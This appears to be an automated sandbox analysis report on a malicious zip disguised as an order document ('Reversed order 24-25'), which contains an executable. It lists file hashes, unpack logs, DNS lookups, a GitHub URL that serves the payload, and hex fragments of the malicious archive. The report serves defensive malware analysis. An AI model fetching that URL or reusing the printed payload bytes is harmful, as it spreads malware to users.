Preview:	01/14/2025 9:37 PM: Unpack: C:\Users\user\Downloads\Reversed order 24-25.zip..01/14/2025 9:37 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\giv5wpek.rbk..01/14/2025 9:37 PM: Received from standard out: ..01/14/2025 9:37 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..01/14/2025 9:37 PM: Received from standard out: ..01/14/2025 9:37 PM: Received from standard out: Scanning the drive for archives:..01/14/2025 9:37 PM: Received from standard out: 1 file, 346769 bytes (339 KiB)..01/14/2025 9:37 PM: Received from standard out: ..01/14/2025 9:37 PM: Received from standard out: Extracting archive: C:\Users\user\Downloads\Reversed order 24-25.zip..01/14/2025 9:37 PM: Received from standard out: --..01/14/2025 9:37 PM: Received from standard out: Path = C:\Users\user\Downloads\Reversed order 24-25.zip..01/14/2025 9:37 PM: Received from standard out: Type = zip..01/14/2025 9:37 PM: Received from standard out: Physical Size = 346769..01/14

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	346769
Entropy (8bit):	7.998718069580938
Encrypted:	true
SSDEEP:
MD5:	F149CA2510F2F8AD31758308F2008551
SHA1:	53C35DC7DE4320CACED7FB1E1961E859E5132E06
SHA-256:	A3AA0398A17BC55BE013E49C10E8DCFE35F6D16A2A15505A534EF10265908BDE
SHA-512:	9ACAFD9F0A208AD6ABAB7D49780B7B135821201E8D1A02374207EB99139893361DFFB0EF5813FA53F0E02B1EF7875FCF183D749A4BD8D49BD398814AE97C48C2
Malicious:	true
Preview:	PK........u-Z8.5..I...L......Reversed order 24-25.exe.[{\|..}...........$K......$K.lK..'o..m.........'^6v......BHP)ql.mjS..P..!.I..! .@i.-.%..H..~.{.7w{.&.O.G.#...f....o~3s;{..[........x..5.>......]5..I..N.7i..u.y....+.5.3...XW..^.Yt....E...qm..q.b.S\|~x.......d..N.x .p.......J.'...7]....f9p./..._.Yx..@..(..o~...0..q..!..ye..h..'..]......;.vQ[.(.P....[.b..Fm....\|...Zu.....Tg.:.]........)..k...7....>T..0.^Z^...[..B.....x.Q.F......F.......V........s.?..d.9.Oe.g@14.2?.7.].%.....z..!~..\|jYP.w ../..s.s...)D...R.O......P.C..c.Q...a....I.s...3......-..9.J4{.4.....b..GaZ..0G.....h(7...{..+F...Yx...[,<.r5.P(#.l...r.A.........J7.T....s.s.w...AT.....F+bfU.`-..s{>A.8.b.d...\'.FUiU.#1".a...lR.Q..5.3.(v4...A....r.......t.l".X.8.2....8..N.d@..Z..~LM.#?..9.2.."...X$.......,gS.Q!..=....a..:...GF...b,$.......E...,2"..0.....c:..tj.....l.S....A.......$Aw2=,l.:M5N.H.X7b.8...H2.J..)=.......z1....A=p..@2..:GF...t.Z2........r...TR.N.#.6.......1%...p..DV

File type:	PDF document, version 2.0, 1 pages
Entropy (8bit):	7.755339141074116
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	Reversed order 24-25.pdf
File size:	69'067 bytes
MD5:	b5f2ed6a5daa6e4c21adf83e40853ecf
SHA1:	514e66f11d8c1a6ed644a82499e2b59315ee9daa
SHA256:	42c1a7d947af73d5843721b690d12f68c3378c878edf4425ce1b3e8a9af56986
SHA512:	f557378a735c6db953d9476e3f50567662cd99c27b3265404b25f974e67b4186514d64d709e3b7e871e87da784c1a4e454f9c26e06bef4577771e1ccfe46e81b
SSDEEP:	1536:16iXERRRkqA4WmmtMw3fvDxpBQqM5O0vKoyEbGZ1e+:uRRRMBP7JQJ5aoyEbF+
TLSH:	AC63F8138C198F93902487E87E571EAD5F197B4DA8C13AEF10664EDF7E643261C8E12E
File Content Preview:	%PDF-2.0.%.....1 0 obj<</Type/Catalog/Pages 2 0 R/Metadata 3 0 R>>.endobj.2 0 obj<</Type/Pages/Kids[4 0 R]/Count 1>>.endobj.3 0 obj<</Type/Metadata/Subtype/XML/Length 914>>stream.<?xpacket begin='...' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x="ad

General
Header:	%PDF-2.0
Total Entropy:	7.755339
Total Bytes:	69067
Stream Entropy:	7.747989
Stream Bytes:	67617
Entropy outside Streams:	5.347638
Bytes outside Streams:	1450
Number of EOF found:	1
Bytes after EOF:

Name	Count
obj	10
endobj	10
stream	3
endstream	3
xref	1
trailer	1
startxref	1
/Page	1
/Encrypt	0
/ObjStm	0
/URI	2
/JS	0
/JavaScript	0
/AA	0
/OpenAction	0
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 03:36:45.107037067 CET	50326	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:36:53.316960096 CET	138	138	192.168.2.4	192.168.2.255
Jan 15, 2025 03:36:58.726238966 CET	61498	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:36:58.726332903 CET	63738	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:36:58.733000040 CET	53	61498	1.1.1.1	192.168.2.4
Jan 15, 2025 03:36:58.733541012 CET	53	63738	1.1.1.1	192.168.2.4
Jan 15, 2025 03:36:58.734097958 CET	53	52494	1.1.1.1	192.168.2.4
Jan 15, 2025 03:36:58.763551950 CET	53	53766	1.1.1.1	192.168.2.4
Jan 15, 2025 03:36:59.734606981 CET	53	55418	1.1.1.1	192.168.2.4
Jan 15, 2025 03:36:59.801734924 CET	59156	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:36:59.801889896 CET	60491	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:36:59.808166027 CET	53	59156	1.1.1.1	192.168.2.4
Jan 15, 2025 03:36:59.808458090 CET	53	60491	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:03.123120070 CET	63483	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:03.123392105 CET	57198	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:03.130172968 CET	53	57198	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:03.130197048 CET	53	63483	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:04.948646069 CET	54065	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:05.138005972 CET	53	54065	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:05.184295893 CET	55161	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:05.184433937 CET	60644	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:05.214983940 CET	53	55161	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:05.337505102 CET	53	60644	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:06.127264977 CET	57835	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:06.127398014 CET	58191	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:06.133250952 CET	53	50233	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:06.133982897 CET	53	57835	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:06.134581089 CET	53	58191	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:06.286464930 CET	56098	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:06.286684990 CET	50689	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:06.476939917 CET	57209	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:06.477097034 CET	55557	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:06.589711905 CET	53	57209	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:06.649274111 CET	53	55557	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:06.831967115 CET	53	50689	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:06.947660923 CET	53	56098	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:08.273428917 CET	64579	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:08.273547888 CET	59461	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:08.781414986 CET	53	59461	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:08.833709955 CET	53	64579	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:09.511992931 CET	60961	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:09.512145042 CET	56758	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:09.519340992 CET	53	56758	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:10.581199884 CET	52471	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:10.584927082 CET	53	60961	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:10.588083029 CET	53	52471	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:10.837047100 CET	53	54572	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:11.924942970 CET	55182	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:11.925085068 CET	64527	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:37:11.932320118 CET	53	64527	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:12.499800920 CET	53	55182	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:15.723267078 CET	53	51864	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:16.711487055 CET	53	59778	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:36.177846909 CET	53	59343	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:58.351629019 CET	53	63982	1.1.1.1	192.168.2.4
Jan 15, 2025 03:37:59.477683067 CET	53	51256	1.1.1.1	192.168.2.4
Jan 15, 2025 03:38:30.069572926 CET	53	50819	1.1.1.1	192.168.2.4
Jan 15, 2025 03:38:34.286303997 CET	53	63110	1.1.1.1	192.168.2.4
Jan 15, 2025 03:39:03.309299946 CET	53159	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:39:03.311961889 CET	54795	53	192.168.2.4	1.1.1.1
Jan 15, 2025 03:39:03.319092989 CET	53	53159	1.1.1.1	192.168.2.4
Jan 15, 2025 03:39:03.321942091 CET	53	54795	1.1.1.1	192.168.2.4

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 15, 2025 03:37:05.337590933 CET	192.168.2.4	1.1.1.1	c221	(Port unreachable)	Destination Unreachable
Jan 15, 2025 03:37:06.649359941 CET	192.168.2.4	1.1.1.1	c221	(Port unreachable)	Destination Unreachable

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 03:36:45.114203930 CET	1.1.1.1	192.168.2.4	0x837e	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:36:45.816256046 CET	1.1.1.1	192.168.2.4	0xbca0	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:36:45.816256046 CET	1.1.1.1	192.168.2.4	0xbca0	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:36:58.733000040 CET	1.1.1.1	192.168.2.4	0x3eec	No error (0)	github.com		140.82.121.3	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:36:59.808166027 CET	1.1.1.1	192.168.2.4	0x4f7e	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:36:59.808166027 CET	1.1.1.1	192.168.2.4	0x4f7e	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:36:59.808166027 CET	1.1.1.1	192.168.2.4	0x4f7e	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:36:59.808166027 CET	1.1.1.1	192.168.2.4	0x4f7e	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:03.130172968 CET	1.1.1.1	192.168.2.4	0x10c5	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 15, 2025 03:37:03.130197048 CET	1.1.1.1	192.168.2.4	0x591b	No error (0)	www.google.com		142.250.185.228	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:05.138005972 CET	1.1.1.1	192.168.2.4	0x79cf	No error (0)	mail.grabinphone.com		103.211.239.66	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:05.214983940 CET	1.1.1.1	192.168.2.4	0xd20	No error (0)	www.woluntech.com		45.63.57.89	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:06.133982897 CET	1.1.1.1	192.168.2.4	0xee10	No error (0)	s.w.org		192.0.77.48	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:06.589711905 CET	1.1.1.1	192.168.2.4	0x7b92	No error (0)	www.woluntech.com		45.63.57.89	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:06.831967115 CET	1.1.1.1	192.168.2.4	0x6ee9	No error (0)	sdk.51.la	sdk.51.la.d183e8b1.cdnhwcgqa21.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:06.831967115 CET	1.1.1.1	192.168.2.4	0x6ee9	No error (0)	sdk.51.la.d183e8b1.cdnhwcgqa21.com	hcdnwsa120.v5.cdnhwczoy106.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:06.947660923 CET	1.1.1.1	192.168.2.4	0xab85	No error (0)	sdk.51.la	sdk.51.la.d183e8b1.cdnhwcgqa21.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:06.947660923 CET	1.1.1.1	192.168.2.4	0xab85	No error (0)	sdk.51.la.d183e8b1.cdnhwcgqa21.com	hcdnwsa120.v5.cdnhwczoy106.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:06.947660923 CET	1.1.1.1	192.168.2.4	0xab85	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		148.153.240.68	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:06.947660923 CET	1.1.1.1	192.168.2.4	0xab85	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.16	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:06.947660923 CET	1.1.1.1	192.168.2.4	0xab85	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.20	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:06.947660923 CET	1.1.1.1	192.168.2.4	0xab85	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.21	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:08.781414986 CET	1.1.1.1	192.168.2.4	0x4d71	No error (0)	sdk.51.la	sdk.51.la.d183e8b1.cdnhwcgqa21.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:08.781414986 CET	1.1.1.1	192.168.2.4	0x4d71	No error (0)	sdk.51.la.d183e8b1.cdnhwcgqa21.com	hcdnwsa120.v5.cdnhwczoy106.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:08.833709955 CET	1.1.1.1	192.168.2.4	0x80b3	No error (0)	sdk.51.la	sdk.51.la.d183e8b1.cdnhwcgqa21.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:08.833709955 CET	1.1.1.1	192.168.2.4	0x80b3	No error (0)	sdk.51.la.d183e8b1.cdnhwcgqa21.com	hcdnwsa120.v5.cdnhwczoy106.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:08.833709955 CET	1.1.1.1	192.168.2.4	0x80b3	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.20	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:08.833709955 CET	1.1.1.1	192.168.2.4	0x80b3	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.21	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:08.833709955 CET	1.1.1.1	192.168.2.4	0x80b3	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		148.153.240.68	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:08.833709955 CET	1.1.1.1	192.168.2.4	0x80b3	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.16	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:09.519340992 CET	1.1.1.1	192.168.2.4	0x8ae	No error (0)	collect-v6.51.la	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:09.519340992 CET	1.1.1.1	192.168.2.4	0x8ae	No error (0)	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com	hcdnwsa120.v5.cdnhwczoy106.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:10.584927082 CET	1.1.1.1	192.168.2.4	0x8b7d	No error (0)	collect-v6.51.la	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:10.584927082 CET	1.1.1.1	192.168.2.4	0x8b7d	No error (0)	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com	hcdnwsa120.v5.cdnhwczoy106.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:10.584927082 CET	1.1.1.1	192.168.2.4	0x8b7d	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.20	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:10.584927082 CET	1.1.1.1	192.168.2.4	0x8b7d	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.21	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:10.584927082 CET	1.1.1.1	192.168.2.4	0x8b7d	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		148.153.240.68	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:10.584927082 CET	1.1.1.1	192.168.2.4	0x8b7d	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.16	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:10.588083029 CET	1.1.1.1	192.168.2.4	0xc1fe	No error (0)	collect-v6.51.la	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:10.588083029 CET	1.1.1.1	192.168.2.4	0xc1fe	No error (0)	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com	hcdnwsa120.v5.cdnhwczoy106.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:10.588083029 CET	1.1.1.1	192.168.2.4	0xc1fe	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.20	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:10.588083029 CET	1.1.1.1	192.168.2.4	0xc1fe	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.21	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:10.588083029 CET	1.1.1.1	192.168.2.4	0xc1fe	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		148.153.240.68	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:10.588083029 CET	1.1.1.1	192.168.2.4	0xc1fe	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.161.16	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:11.932320118 CET	1.1.1.1	192.168.2.4	0x9da1	No error (0)	collect-v6.51.la	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:11.932320118 CET	1.1.1.1	192.168.2.4	0x9da1	No error (0)	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com	hcdnwsa120.v5.cdnhwczoy106.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:12.499800920 CET	1.1.1.1	192.168.2.4	0x5500	No error (0)	collect-v6.51.la	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:12.499800920 CET	1.1.1.1	192.168.2.4	0x5500	No error (0)	collect-v6.51.la.d183e8b1.cdnhwcgqa21.com	hcdnwsa120.v5.cdnhwczoy106.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 03:37:12.499800920 CET	1.1.1.1	192.168.2.4	0x5500	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		38.54.26.75	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:12.499800920 CET	1.1.1.1	192.168.2.4	0x5500	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		38.54.26.74	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:12.499800920 CET	1.1.1.1	192.168.2.4	0x5500	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.164.15	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:37:12.499800920 CET	1.1.1.1	192.168.2.4	0x5500	No error (0)	hcdnwsa120.v5.cdnhwczoy106.cn		90.84.164.16	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:39:03.319092989 CET	1.1.1.1	192.168.2.4	0x9412	No error (0)	www.google.com		216.58.206.68	A (IP address)	IN (0x0001)	false
Jan 15, 2025 03:39:03.321942091 CET	1.1.1.1	192.168.2.4	0x88b9	No error (0)	www.google.com			65	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:36:59 UTC	730	OUT	GET /donmodely2k/poczta.github.io/raw/refs/heads/main/Reversed%20order%2024-25.zip HTTP/1.1 Host: github.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:36:59 UTC	588	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 15 Jan 2025 02:36:59 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: Location: https://raw.githubusercontent.com/donmodely2k/poczta.github.io/refs/heads/main/Reversed%20order%2024-25.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-01-15 02:36:59 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:00 UTC	741	OUT	GET /donmodely2k/poczta.github.io/refs/heads/main/Reversed%20order%2024-25.zip HTTP/1.1 Host: raw.githubusercontent.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:37:00 UTC	893	IN	HTTP/1.1 200 OK Connection: close Content-Length: 346769 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "6fdf86613d0f3716da1979efeea4ac2ed000e3936bc4d845053c852eaf02cc20" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 3409:399A0F:49796B:51B277:67871F4C Accept-Ranges: bytes Date: Wed, 15 Jan 2025 02:37:00 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890022-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736908620.360332,VS0,VE117 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: cc38d147cedab6108ace36db760eeee8811ba939 Expires: Wed, 15 Jan 2025 02:42:00 GMT Source-Age: 0
2025-01-15 02:37:00 UTC	1378	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 75 2a 2d 5a 38 a3 35 c9 ff 49 05 00 00 4c 08 00 18 00 00 00 52 65 76 65 72 73 65 64 20 6f 72 64 65 72 20 32 34 2d 32 35 2e 65 78 65 ec 5b 7b 7c 1c c5 7d ff dd de dd de dd de 9d a4 bd 93 ee 24 4b 96 ce 0f 89 b5 ef 24 4b 96 6c 4b e6 e5 27 6f 02 a9 6d 1e 06 8a 0d 18 b0 01 af bb 27 5e 36 76 94 90 d0 12 0c 01 42 48 50 29 71 6c 03 6d 6a 53 0a 09 50 9b 87 21 c4 49 00 f3 8e 21 20 8b 40 69 d2 a6 2d a5 25 e4 d9 48 fd fd 7e b3 7b b7 37 77 7b d8 26 9f 4f fb 47 f7 23 ed ce fc 66 be df 99 f9 cd 6f 7e 33 73 3b 7b ea f2 5b c1 0f 00 01 fc 1f 1f 07 78 0c c4 35 0f 3e f9 1a c2 ff 9a b6 5d 35 f0 9d c8 be 49 8f f9 4e d9 37 69 e9 a5 ab f3 99 75 96 79 89 b5 f2 8a cc 85 2b d7 ae 35 07 33 17 ac ca 58 57 ae cd ac 5e 9b 59 74 da 92 cc 15 e6 45 ab ba e2 Data Ascii: PKu*-Z85ILReversed order 24-25.exe[{\|}$K$KlK'om'^6vBHP)qlmjSP!I! @i-%H~{7w{&OG#fo~3s;{[x5>]5IN7iuy+53XW^YtE
2025-01-15 02:37:00 UTC	1378	IN	Data Raw: 66 60 13 67 e8 33 f4 2e 6e 62 8f de 33 f7 e4 f1 f1 71 c3 a2 cc 33 13 33 ad 8b b0 2f 8c 3c c6 ac cd 14 1a 24 79 07 db 85 de 21 62 47 e8 19 fd 08 e3 4a 0c 9a 57 81 bb 93 7a 5d c3 e1 6a 12 f4 e9 7d 29 f3 1a ca 93 bf 96 e2 b3 f4 3e eb 4e 64 b5 f6 e2 2d bf 9e 18 36 70 0b fa 32 27 e3 fc 64 5e 27 22 d6 87 98 6c 6e 74 e3 66 31 2e bf 89 20 9f e3 5c b3 cc 21 aa e4 04 3f 66 fd bc 90 58 c7 61 44 18 e8 17 28 6d 05 46 95 0d 64 96 8d c3 c6 f5 04 fd a2 c8 98 36 bf 64 23 d6 94 22 76 50 f4 06 ca f9 e7 94 41 0c 87 bf a0 2a cc 4e 25 e7 64 3b f4 d9 fa 9c e1 64 bf de 9f bf 91 84 03 58 8b 2f 63 40 1f 30 6f 12 da 9d 83 da 9d a3 cf d1 67 b3 76 e7 ea 73 3b 5f d0 fb 30 d7 e6 12 45 1d 59 50 14 cd 07 f3 9f 15 8e 12 a7 08 c0 f9 05 50 75 3c c7 ce e2 e9 04 e0 05 fc 47 5f 0f ef 48 f2 0f Data Ascii: f`g3.nb3q33/<$y!bGJWz]j})>Nd-6p2'd^'"lntf1. \!?fXaD(mFd6d#"vPA*N%d;dX/c@0ogvs;_0EYPPu<G_H
